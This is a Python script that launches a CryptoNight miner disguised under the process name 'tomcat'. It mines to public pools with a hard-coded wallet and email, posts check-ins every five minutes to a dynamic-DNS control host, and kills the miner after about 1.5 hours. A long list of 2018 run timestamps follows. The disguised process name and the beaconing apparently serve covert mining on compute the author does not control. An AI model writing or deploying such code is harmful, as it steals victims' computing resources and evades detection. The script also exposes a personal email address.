import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:37:04.341748
#2018-02-17 17:25:03.934814
#2018-02-17 19:14:05.091812
#2018-02-17 21:04:01.754039
#2018-02-17 22:49:04.309092
#2018-02-18 00:33:06.626043
#2018-02-18 02:23:07.282432
#2018-02-18 04:10:06.901027
#2018-02-18 06:01:05.590842
#2018-02-18 07:51:07.040230
#2018-02-18 09:39:07.185594
#2018-02-18 11:25:07.592468
#2018-02-18 13:11:04.626273
#2018-02-18 14:59:04.000876
#2018-02-18 16:48:01.820634
#2018-02-18 18:35:08.430834
#2018-02-18 20:23:05.926157
#2018-02-18 22:09:06.232065
#2018-02-18 23:57:06.365234
#2018-02-19 01:43:05.576233
#2018-02-19 03:32:01.504909
#2018-02-19 05:17:03.498071
#2018-02-19 07:05:06.002209
#2018-02-19 08:54:04.261627
#2018-02-19 10:43:06.948176
#2018-02-19 12:31:05.510737
#2018-02-19 14:17:09.407591
#2018-02-19 16:07:01.987737
#2018-02-19 17:55:06.647935
#2018-02-19 19:41:01.563451
#2018-02-19 21:28:02.139923
#2018-02-19 23:14:04.878663
#2018-02-20 01:01:02.159400
#2018-02-20 02:50:03.173112
#2018-02-20 04:39:07.495141
#2018-02-20 06:23:05.097621
#2018-02-20 08:08:07.628859
#2018-02-20 09:53:06.140238
#2018-02-20 11:37:07.329867
#2018-02-20 13:24:01.524767
#2018-02-20 15:08:07.944819
#2018-02-20 16:52:01.381026
#2018-02-20 18:41:11.791860
#2018-02-20 20:33:07.282964
#2018-02-20 22:18:04.025598
#2018-02-20 23:58:05.700635
#2018-02-21 01:43:02.081074
#2018-02-21 03:30:08.615812
#2018-02-21 05:18:06.034219
#2018-02-21 07:06:06.197524
#2018-02-21 08:52:05.779240
#2018-02-21 10:39:04.640448
#2018-02-21 12:26:06.626949
#2018-02-21 14:13:06.479151
#2018-02-21 15:59:01.932349
#2018-02-21 17:51:07.131015
#2018-02-21 19:36:01.327077
#2018-02-21 21:23:08.486526
#2018-02-21 23:11:06.212797
#2018-02-22 01:01:02.228360
#2018-02-22 02:49:07.735057
#2018-02-22 04:35:08.328474
#2018-02-22 06:20:06.307420
#2018-02-22 08:07:03.874417
#2018-02-22 09:53:08.472149
#2018-02-22 11:37:06.127867
#2018-02-22 13:25:09.850528
#2018-02-22 15:13:05.495838
#2018-02-22 16:57:12.496142
#2018-02-22 18:45:12.751779
#2018-02-22 20:37:07.984985
#2018-02-22 22:23:05.592285
#2018-02-23 00:09:08.071157
#2018-02-23 01:59:01.452931
#2018-02-23 03:35:06.184425
#2018-02-23 05:21:03.707668
#2018-02-23 07:06:07.611517
#2018-02-23 08:57:01.311455
#2018-02-23 11:15:11.724419
#2018-02-23 13:09:01.751136
#2018-02-23 14:55:07.628645
#2018-02-23 16:43:09.959946
#2018-02-23 18:30:04.917271
#2018-02-23 20:14:07.101032
#2018-02-23 22:04:02.035634
#2018-02-23 23:53:07.686322
#2018-02-24 01:44:02.191259
#2018-02-24 03:36:06.643199
#2018-02-24 05:21:05.737247
#2018-02-24 07:09:03.503921
#2018-02-24 08:56:03.920513
#2018-02-24 10:58:06.070972
#2018-02-24 12:47:01.329689
#2018-02-24 14:36:07.047149
#2018-02-24 16:22:03.846861
#2018-02-24 18:16:05.854143
#2018-02-24 20:02:04.065657
#2018-02-24 21:44:07.299490
#2018-02-25 01:57:05.025908
#2018-02-25 05:47:03.258719
#2018-02-25 11:37:05.904946